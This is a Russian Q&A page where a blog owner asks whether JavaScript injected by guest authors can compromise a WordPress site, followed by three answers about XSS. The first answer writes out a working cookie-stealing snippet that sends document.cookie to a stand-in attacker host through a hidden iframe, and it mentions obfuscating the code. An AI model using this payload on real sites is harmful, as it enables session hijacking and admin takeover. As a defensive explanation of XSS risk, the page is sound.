Страницы

Поиск по вопросам

четверг, 5 декабря 2019 г.

Могут ли взломать сайт с помощью внедрения JS кода?

#взлом #javascript


Да-да, многие говорят что фантазия безгранична, и что взломать вроде можно, но я
пока не вижу способов, да я и в JS не большой спец. Хотелось бы увидеть конкретный
пример взлома сайта (получения доступа к ftp, к файлам, возможность удалять/создавать
файлы, менять права и тп.)

Для внутренних органов: интересуюсь чисто в целях самозащиты =) Хочу давать право
на написание статей на блоге незнакомым авторам, вот и интересно - WP пропускает JS
прекрасно, делать с этим что-то, или оставить так.
    


Ответы

Ответ 1



Банальный пример: var i = document.createElement('iframe'); i.style='width: 1px; height: 1px; visibility: hidden;'; document.getElementsByTagName('body')[0].appendChild(i); i.src='http://vasya-pupkin-xakep.org/stealcookie.php?c='+document.cookie; Таким образом хакер Вася Пупкин часто тырит админские куки и очень быстро заходит с ними на сайт. Если у админа есть возможность редактировать файлы из админки - это полный контроль (есть такие штуки как phpftp и phpmyadmin) Также этот код можно за- и перешифровать три раза, чтобы это был нечитаемый набор символов. Вместо куков можно просто таким образом накручивать посещения другому сайту etc.

Ответ 2



Вообще через js можно проводить xss атаки, а если у вас на сайте ajax и серверная часть самописная, никто не исключает, что таким образом можно будет как-то напакостить в системе; например: у вас в обработчике ajax есть метод DeleteFileOnServer, если при выполнении метода никак не проверяются права, то можно представить ситуации, в которых злоумышленник сформирует ajax запрос, используя метод DeleteFileInServer, и удалит какой-либо файл, не имея на это право, однако в большинстве случаев, подобные вещи тестируются разработчиками веб-приложения, воодится проверка прав и тд. По теме: методика атак XSS, общие словеса на тему ajax-security.

Ответ 3



Это невозможно. Максимум, что может быть, - это кража кук. И то напрямую их отправить не удастся (AJAX на другой домен запрещен и не работает, лично проверял). Придется отправлять в запросе картинки, например img.png?jesnfjkndsfjkndskjweklfngjksdngjksnjdsg - в конце закодирован кук. Такую технологию, например, использует веб-аналитика Yandex WebVisor (лично смотрел). Есть еще нюансы. JS может создать текст внутри страницы, который потом будет проиндексирован Гуглом. Это правда - лично убедился на примере партнерки фотостраны, когда ключевые слова питомец, подарок оказались самыми частотными согласно webmasters.google.com (сайт про апокалипсис). Еще недобросовестные авторы смогут переадресовать страницу, делать ссылки, картинки, баннеры. Но к ftp, к файлам доступ получить невозможно будет.

Комментариев нет:

Отправить комментарий